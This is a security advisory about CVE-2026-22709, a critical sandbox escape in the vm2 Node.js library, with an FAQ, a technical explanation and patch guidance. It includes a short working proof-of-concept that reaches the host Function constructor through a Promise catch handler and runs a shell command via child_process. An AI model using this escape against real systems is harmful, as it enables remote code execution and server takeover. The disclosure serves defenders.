What is CVE-2026-22709?

It is a critical sandbox escape vulnerability in the vm2 Node.js library that allows attackers to run arbitrary code on the host system.

How does the exploit work?

Attackers abuse a lack of sanitization in global Promise callbacks returned by async functions to access the host's Function constructor.

Which versions of vm2 are affected?

All versions of vm2 up to and including 3.10.0 are vulnerable to this sandbox escape.

How can I fix this vulnerability?

You must update the vm2 library to version 3.10.2 or 3.10.3 to resolve the flaw.

What is the impact of a successful attack?

An attacker can execute shell commands with the permissions of the Node.js process, leading to full server takeover or data theft.

Advisory

Critical Sandbox Escape in vm2 Library Allows Remote Code Execution

published: Jan. 28, 2026

Take action: If you're using the vm2 library for Node.js, immediately update to version 3.10.3 to fix CVE-2026-22709 - version 3.10.1 is NOT safe. If you can't update right away, stop running any untrusted code through vm2 or switch to stronger isolation methods like containers.

Learn More

The vm2 library for Node.js is reported to contain a critical sandbox escape flaw that lets attackers break out of isolated environments and run untrusted code on the host server. The issue is a major risk for any application that uses vm2 to execute user-supplied scripts, such as SaaS platforms, code runners, and chatbots.

The flaw is tracked as CVE-2026-22709 (CVSS score 9.8) and is caused by improper sanitization callbacks for global Promises. While the library sanitizes its own internal Promise implementation, async functions return global Promises that bypass these checks. Attackers can use this gap to access the system's main functions and escape the sandbox.

By catching a specific error, the attacker can reach the system's Function constructor. This allows them to call the child_process module and run shell commands with the same permissions as the Node.js process. This breaks all isolation guarantees provided by the library.

This exploit example creates an async function that returns a global Promise. The catch handler accesses the unsanitized constructor chain to reach the Function constructor, enabling arbitrary command execution and complete sandbox escape.

const { VM } = require("vm2");

const exploit = `
const error = new Error();
error.name = Symbol();
const f = async () => error.stack;
f().catch(e => {
    const Function = e.constructor.constructor;
    Function("process.mainModule.require('child_process').execSync('whoami')")();
});
`;

new VM().run(exploit);

The vm2 project was previously shut down in 2023 due to many security bugs but was restarted in late 2025. Despite its history of vulnerabilities, the library remains popular with nearly one million downloads every week on the npm platform.

Developers must update to version 3.10.2 or 3.10.3 immediately to fix this issue. Version 3.10.1 only partially addressed the bug, leaving systems at risk. If you cannot update, you should stop running untrusted code or move to a more secure isolation method like hardware-level virtualization or containers.

Critical Sandbox Escape in vm2 Library Allows Remote Code Execution

Read More
Critical buffer overflow flaw in Squid HTTP Proxy …
PHP releases version 8.0.30, patching two critical vulnerabilities
Gitlab reports unauthorized pipeline execution flaw, urges patching …
Supply Chain Attack Targets Axios npm Package with …
Critical n8n Vulnerabilities Enable Remote Code Execution and …